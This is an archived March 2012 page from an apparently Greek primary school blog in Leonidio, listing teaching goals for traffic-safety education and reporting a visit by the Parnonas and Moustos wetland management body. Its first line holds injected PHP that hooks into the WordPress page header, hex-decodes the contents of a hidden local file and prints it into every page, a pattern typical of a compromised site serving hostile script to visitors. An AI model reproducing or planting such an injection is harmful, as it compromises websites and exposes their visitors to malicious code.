if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μάρτιος, 2012 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Μάρτιος 2012

Αγαπώ τον τόπο μου. Λεωνίδιο

Κυκλοφοριακή Αγωγή

Οι διδακτικοί στόχοι που μπορούν να εξυπηρετηθούν μέσω της Κυκλοφοριακής Αγωγής είναι οι εξής:

 

1. Γνωστικοί

  • Να γνωρίσουν οι μαθητές τι σημαίνει «Κυκλοφοριακή Αγωγή».
  • Να αντιληφθούν με σαφήνεια πώς λειτουργούν τα σήματα και τι σημαίνει το καθένα.
  • Να μπορούν σε κάποια δεδομένη στιγμή να εφαρμόσουν με επιτυχία αυτά που θα μάθουν κατά τη διάρκεια της εργασίας.
  • Να αναγνωρίσουν τα λάθη στην οδική τους συμπεριφορά και να καταφέρουν να τα διορθώσουν.

 

2. Ψυχοκινητικοί

  • Ενεργοποίηση όλων των αισθήσεων των παιδιών με εργασίες δημιουργικές, θεατρικό παιχνίδι και άλλες δραστηριότητες.

 

3. Συναισθηματικοί

  • Να ευαισθητοποιηθούν τα παιδιά σε διάφορα θέματα Κυκλοφοριακής Αγωγής.
  • Να αποκτήσουν κυκλοφοριακή συνείδηση.
  • Να αποκτήσουν θετική στάση στα θέματα οδικής ασφάλειας.

 

4. Κοινωνικοί

  • Εργασία σε ομάδες.
  • Ανάπτυξη πρωτοβουλιών από τους μαθητές.
  • Αρμονική συνεργασία και ανάπτυξη δημιουργικής εργασίας.
  • Με αφορμή την ανάγνωση ενός κειμένου από το βιβλίο Σαμπέ-Γκοσίνι «ο μικρός Νικόλας έχει προβλήματα. Προβληματισμός συζήτηση με θέμα «τα τροχαία ατυχήματα και πώς να τα αποφύγουμε
  • Αναζήτηση άλλων κειμένων από το διαδίκτυο ? εφημερίδες ? κείμενο Καββαθά από τα βιβλία της Ε.Ζ, Ε? και ΣΤ
  • Χωρισμός σε ομάδες ? ερευνούν καταγράφουν ? σκέπτονται – επικοινωνούν

Ο Φορέας Διαχείρισης Όρους Πάρνωνα & Υγροτόπου Μουστού επισκέπτεται το σχολείο μας.

Οι υγρότοποι, εκτός από την πλούσια βιοποικιλότητα που υποστηρίζουν και τις φυσικές λειτουργίες που επιτελούν, έχουν για τον άνθρωπο πολλές και σπουδαίες αξίες, μεταξύ των οποίων είναι η υδρευτική, η αρδευτική, η αντιπλημμυρική και η αντιδιαβρωτική, η βελτιωτική του κλίματος, η αλιευτική, η επιστημονική και εκπαιδευτική, και άλλες ακόμη. Με αφορμή την Παγκόσμια Ημέρα Υγροτόπων που εορτάζεται κάθε χρόνο στις 2 Φεβρουαρίου, ο Φορέας Διαχείρισης Όρους Πάρνωνα και Υγροτόπου Μουστού με σκοπό την ανάδειξη της αξίας των πολύτιμων αλλά και πολύπαθων υγροτοπικών οικοσυστημάτων, πραγματοποίησε επίσκεψη περιβαλλοντικής ενημέρωσης στο Δημ Σχ.Λεωνιδίου στις 23/02/2012.

Η επίσκεψη στο σχολείο μας από τους δύο ξεναγούς του Φορέα Διαχείρισης, αφορούσε  μια ολοκληρωμένη παρουσίαση με θέμα «Υγρότοποι: λειτουργίες, αξίες και απειλές» με στόχο την ενημέρωση και ευαισθητοποίηση των μαθητών γύρω από τη ζωτική σημασία των υγροτόπων, αλλά και τα προβλήματα υποβάθμισης που αντιμετωπίζουν οι εναπομείναντες υγρότοποι της χώρας μας.

Ο Φορέας Διαχείρισης εντός της τρέχουσας Προγραμματικής Περιόδου (2010-2015) πρόκειται να συνεχίσει τις επισκέψεις περιβαλλοντικής ενημέρωσης στα σχολεία που γειτνιάζουν ή χωροθετούνται εντός της Προστατευόμενης Περιοχής. Δεδομένου ότι η σχέση του ανθρώπου με το περιβάλλον δομείται από τα πρώτα χρόνια της σχολικής του ζωής, η συνειδητοποίηση των μικρών μαθητών πως η ορθολογική διαχείριση του περιβάλλοντος είναι ένα πολύ σημαντικό ζήτημα για τη διασφάλιση και την προστασία του, αποτελεί έναν από τους βασικούς σκοπούς του Τμήματος Πληροφόρησης, Εκπαίδευσης και Δημοσιότητας.


.